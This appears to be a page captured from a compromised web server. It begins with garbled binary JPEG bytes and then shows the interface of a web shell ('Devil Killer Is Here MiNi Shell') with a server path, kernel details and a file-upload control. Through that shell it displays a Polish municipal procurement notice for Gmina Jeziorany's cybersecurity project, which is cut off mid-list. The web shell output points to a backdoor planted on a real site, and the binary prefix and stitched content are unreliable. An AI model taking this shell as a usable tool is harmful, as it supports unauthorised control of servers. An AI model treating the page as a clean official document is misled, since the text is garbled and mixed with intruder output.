JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250805/0036237001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Podniesienie poziomu cyberbezpieczeństwa w Gminie Jeziorany </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jeziorany</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743551</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Zamkowy 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jeziorany</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@jeziorany.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.jeziorany.nowoczesnagmina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Podniesienie poziomu cyberbezpieczeństwa w Gminie Jeziorany </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a87eb027-443e-434f-a3e4-79ebbfe02fda</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00362370</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00061728/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Cyberbez[ieczny samorząd</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie na Rozwój Cyfrowy 2021-2027 (FERC) Priorytet II: Zaawansowane usługi cyfrowe Działanie 2.2. – Wzmocnienie krajowego systemu cyberbezpieczeństwa konkurs grantowy w ramach Projektu grantowego „Cyberbezpieczny Samorząd” o numerze FERC.02.02-CS.01-001/23. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a87eb027-443e-434f-a3e4-79ebbfe02fda <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu Zamawiający utrzymuje kontakt z Wykonawcami za pośrednictwem Platformy e-Zamówienia. Platforma ta jest dostępna pod adresem https://ezamowienia.gov.pl włączając w to proces składania ofert.<br/>2.	Zamawiający nie dopuszcza możliwości komunikacji na linii Zamawiający - Wykonawcy za pośrednictwem poczty elektronicznej.3.Zamawiający informuje jednocześnie, że korzystanie z Platformy e-Zamówienia jest bezpłatne. 4.Zamawiający informuje, że każdy Wykonawca, którego zamiarem jest wzięcie udziału w postępow. o udziel. zamów. publ. musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Wszelkie szczegółowe informacje na temat otwierania kont oraz zasady i regulaminy korzystania z Platformy e-Zamówienia określają regulaminy Platformy e-Zamówienia dostępne na stronie https://ezamowienia.gov.pl , w szczególności w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.	Zamawiający informuje, że przeglądanie oraz pobieranie treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia.<br/>6.	Zamawiający informuje, że korzystanie w pełnym zakresie z „Formularzy kontaktowych” na Platformie e-Zamówienia wymaga posiadania konta „Wykonawcy” oraz zalogowania się na Platformie e-Zamówienia. Jednocześnie Zamawiający informuje, że do korzystania z „Formularzy kontaktowych” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Wszelkie wysłane oraz odebrane wiadomości są widoczne dla Wykonawcy po zalogowaniu się i w podglądzie postępowania w zakładce „Komunikacja”. <br/>7.	Zamawiający informuje, że sposób sporządzania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektronicznej treści musi być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>8.	Zamawiający informuje, że komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywać się będzie drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce Formularze – „Formularze kontaktowe”. Za pośrednictwem „Formularzy kontaktowych” odbywać się będzie w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielania odpowiedzi. „Formularze kontaktowe” umożliwiają także dodatnie załącznika do przesyłanej wiadomości. <br/>9.	Zamawiający informuje, że w przypadku załączników, które zgodnie z Ustawą Pzp i/lub Rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych są opatrzone kwalifikowanym podpisem elektronicznym, podpisem profilem zaufanym lub podpisem osobistym, mogą być opatrzone (zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/Podmiotu udostępniającego zasoby), podpisem typu zewnętrznego lub wewnętrznego. Zgodnie z tym, w zależności od rodzaju użytego podpisu i jego typu (typ zewnętrzny lub wewnętrzny), dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (podpis typu zewnętrznego) lub dokument z ujętym podpisem (podpis typu wewnętrznego). <br/>10.	Zamawiający informuje, że maksymalny rozmiar plików wysyłanych za pośrednictwem Platformy e-Zamówienia i „Formularzy kontaktowych” wynosi 150 MB (wielkość plików przesyłanych jako załączniki w ramach jednego formularza). <br/>11.	Zamawiający informuje, że minimalne wymagania techniczne dotyczące użytkowanego sprzętu w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia internetowego określają Regulaminy Platformy e-Zamówienia. <br/>12.	Zamawiający informuje, że w przypadku problemów technicznych i awarii dotyczących prawidłowego funkcjonowania Platformy e-Zamówienia użytkownicy Platformy mogą korzystać ze wsparcia technicznego pod numerem kontaktowym (+48) 22 258 77 88 lub drogą elektroniczną poprzez formularz kontaktowy dostępny na Platformie e-Zamówienia w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy, że: 1.Administratorem Pani/Pana danych osobowych jest Gmina Jeziorany, Plac Zamkowy 4, reprezentowana przez Burmistrza Jezioran. Wykonawca może kontaktować się z Zamawiającym pisemnie na adres podany powyżej, telefonicznie: tel. (+48) 89 539 27 41, lub pod adresem poczty elektronicznej: um@jeziorany.com.pl.2.Administrator wyznaczył inspektora danych osobowych, z którym może się Pani/Pan skontaktować pisemnie na adres Gmina Jeziorany, Plac Zamkowy 4 lub za pomocą poczty elektronicznej: e-mail: krzysztofkiljan1@gmail.com lub telefonicznie 89 539 27 64.3.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia w ramach Projektu Grantowego pn. „Podniesienie poziomu cyberbezpieczeństwa w Gminie Jeziorany” realizowany jest w ramach Programu Operacyjnego Fundusze Europejskie na Rozwój Cyfrowy 2021–2027 (FERC) Działanie 2.2. pn. „Wzmocnienie krajowego systemu cyberbezpieczeństwa”. Postępowanie prowadzone w trybie podstawowym.<br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dok. postępow. w oparciu o art. 18 oraz art. 74 ust. 1 i ust. 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, dalej „ustawa Pzp”. Ponadto odbiorcą Pani/Pana danych mogą być podmioty świadczące usługi na rzecz Administratora w oparciu o zawarte umowy powierzenia przetwarzania danych, w tym podmioty świadcz. usługi hostingowe, usługi dotyczące utrzymania systemów informatycznych, usługi doradcze. Dane mogą być również udostępnione operatorom pocztowym w zakresie niezbędnym do prowadzenia korespondencji oraz podmiotom upoważ.do dostępu do danych na mocy przepisów prawa.<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udziel.zam., a jeżeli czas trwania umowy przekr. 4 lata, okres przechowyw. obejmuje cały czas trwania umowy.6.Obowiązek podania przez Panią/Pana danych osobowych bezpośr. Pani/Pana dotycz. jest wym.ustawowym określ. w przep. ustawy Pzp, zw. z udziałem w postęp. o udzielenie zam. publicznego; konsekwencje niepodania określ.danych wynikają z ustawy Pzp.<br/>7.	W odnies. do Pani/Pana danych osobowych dec. nie będą podejm. w spos.zautomatyzowany, stosowanie do art. 22 RODO;8.	Posiada Pani/Pan:	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;na podstawie art. 18 RODO prawo żądania od administratora ogran. przetw. danych osobowych z zastrzeż. przypad., o których mowa w art. 18 ust. 2 RODO **;prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (na adres Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00 - 193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9.Nie przysługuje Pani/Panu:	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: skorzyst.z prawa do sprostow. nie może skutk. zm. wyniku postępow. o udziel. zam. publi. ani zmianą postanow.umowy w zakr. niezgod.z ustawą Pzp oraz nie może narusz.integralności protok. oraz jego zał.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	usługa przeprowadzenia końcowego audytu SZBI dla Urzędu Miasta Jeziorany;<br/>2)	usługa przeprowadzenia końcowego audytu SZBI dla Centrum Usług Wspólnych <br/>w Jezioranach;<br/>3)	usługa przeprowadzenia końcowego audytu SZBI dla Miejskiego Ośrodka Pomocy Społecznej w Jezioranach;<br/>4)	usługa opracowania dokumentacji z zakresu SZBI dla Urzędu Miejskiego w Jezioranach;<br/>5)	usługa opracowania dokumentacji z zakresu SZBI dla Centrum Usług Wspólnych <br/>w Jezioranach;<br/>6)	usługa opracowania dokumentacji z zakresu SZBI dla Ośrodka Pomocy Społecznej w Jezioranach;<br/>7)	usługa przeprowadzenia szkolenia z zakresu SZBI dla kadry zarządzającej Urzędu Miejskiego w Jezioranach, Centrum Usług Wspólnych w Jezioranach oraz Ośrodka Pomocy Społecznej w Jezioranach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79212000-3 - Usługi audytu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72800000-8 - Usługi audytu komputerowego i testowania komputerów</p> <p class="mb-0">72810000-1 - Usługi audytu komputerowego</p> <p class="mb-0">80532000-2 - Usługi szkolenia w dziedzinie zarządzania</p> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>100 % cena<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>2.	Punkty za kryterium Cena (C) zostaną obliczone według wzoru:<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium Cena (C), oferta z najniższą ceną otrzyma 100 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>3.	Jako najkorzystniejszą ofertę w danej części zamówienia Zamawiający wybierze ofertę, spośród ofert niepodlegających odrzuceniu, która uzyska największą liczbę punktów (P), obliczoną wg następującego wzoru: P = C <br/>gdzie:<br/>P - ocena końcowa ocenionej (badanej) oferty,<br/>C - ilość punktów uzyskanych przez ocenianą ofertę w kryterium Cena (C).<br/>4.	Zamawiający informuje, że Wykonawcy zostaną niezwłocznie poinformowani o wyborze najkorzystniejszej oferty dla danych Części postępowania, po uprzedniej weryfikacji złożonych ofert. <br/>5.	Zamawiający, zgodnie z art. 253 ust. 1 ustawy Pzp, niezwłocznie po wyborze najkorzystniejszej oferty informuje wszystkich Wykonawców o wyniku postępowania, w tym o wybranej ofercie, przyznanych punktach oraz o odrzuconych ofertach wraz z uzasadnieniem.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	usługa przeprowadzenia szkolenia z zakresu cyberbezpieczeństwa dla pracowników Urzędu Miejskiego w Jezioranach, Centrum Usług Wspólnych w Jezioranach oraz Miejskiego Ośrodka Pomocy Społecznej w Jezioranach, po 1 szt. na jednostkę;<br/>2)	usługa przeprowadzenia szkolenia personelu z zakresu podatności na ataki socjotechniczne z wykorzystaniem testów socjotechnicznych oraz z dostępem do platformy e-learningowej dla Urzędu Miejskiego w Jezioranach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>100 % cena<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>2.	Punkty za kryterium Cena (C) zostaną obliczone według wzoru:<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium Cena (C), oferta z najniższą ceną otrzyma 100 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>3.	Jako najkorzystniejszą ofertę w danej części zamówienia Zamawiający wybierze ofertę, spośród ofert niepodlegających odrzuceniu, która uzyska największą liczbę punktów (P), obliczoną wg następującego wzoru: P = C <br/>gdzie:<br/>P - ocena końcowa ocenionej (badanej) oferty,<br/>C - ilość punktów uzyskanych przez ocenianą ofertę w kryterium Cena (C).<br/>4.	Zamawiający informuje, że Wykonawcy zostaną niezwłocznie poinformowani o wyborze najkorzystniejszej oferty dla danych Części postępowania, po uprzedniej weryfikacji złożonych ofert. <br/>5.	Zamawiający, zgodnie z art. 253 ust. 1 ustawy Pzp, niezwłocznie po wyborze najkorzystniejszej oferty informuje wszystkich Wykonawców o wyniku postępowania, w tym o wybranej ofercie, przyznanych punktach oraz o odrzuconych ofertach wraz z uzasadnieniem.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	dostawa serwerów (2 szt.) wraz z licencjami dla Urzędu Miejskiego w Jezioranach;<br/>2)	dostawa zasilaczy UPS do stacji roboczych dla Urzędu Miejskiego w Jezioranach (60 szt.);<br/>3)	dostawa kluczy sprzętowych U2F dla Urzędu Miejskiego w Jezioranach (60 szt.);<br/>4)	dostawa stacji roboczych typu all-in-one (6 szt) wraz z licencjami dla Centrum Usług Wspólnych w Jezioranach;<br/>5)	dostawa przełączników sieciowych (3 szt.) dla Urzędu Miejskiego w Jezioranach;<br/>6)	dostawa dodatkowych dysków SSD (5 szt.) dla Urzędu Miejskiego w Jezioranach;<br/>7)	dostawa serwera NAS (1 szt.) dla Urzędu Miejskiego w Jezioranach:<br/>8)	dostawa serwera (1 szt.) dla Miejskiego Ośrodka Pomocy Społecznej w Jezioranach;<br/>9)	dostawa urządzenia UTM (1 szt.) dla Miejskiego Ośrodka Pomocy Społecznej w Jezioranach;<br/>10)	dostawa serwera NAS (1 